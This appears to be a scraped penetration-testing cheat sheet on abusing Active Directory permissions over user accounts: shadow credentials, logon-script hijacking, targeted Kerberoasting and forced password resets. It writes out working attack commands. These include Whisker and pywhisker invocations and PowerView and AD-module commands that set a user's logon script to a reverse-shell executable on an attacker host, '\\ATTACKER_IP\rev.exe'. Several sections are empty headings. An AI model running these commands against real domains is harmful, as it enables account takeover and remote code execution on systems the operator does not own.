githubEdit

User

DACL Attacks on a user

1) WriteProperty

ShadowCredentials

Whisker.exe add /target:<target> /domain:domain.local /dc:dc.domain.local /path:C:\path\to\file.pfx /password:"Password123!"

Linux

pywhisker.py -t user2 -a add -u user1 -p password -d domain.local -dc-ip <DC_IP> --filename user2

Logon Script

PowerView

Set-DomainObject <target> -Set @{'mstsinitialprogram'='\\ATTACKER_IP\rev.exe'} -Verbose

AD module

Set-ADObject -SamAccountName '<target>' -PropertyName scriptpath -PropertyValue "\\ATTACKER_IP\rev.exe"

Targeted Kerberoasting

We can then request a ST without special privileges. The ST can then be "Kerberoasted".

Verify if the user already has a SPN

Using ActiveDirectory module

TIP: New SPN must be unique in the domain

Set the SPN

Using ActiveDirectory module

Request the ticket

From PowerView

Linux

Set SPN on all the possible users, request the ticket and delete the SPN

2) User-Force-Change-Password

With enough permissions on a user, we can change his password

With PowerView

Linux

Last updated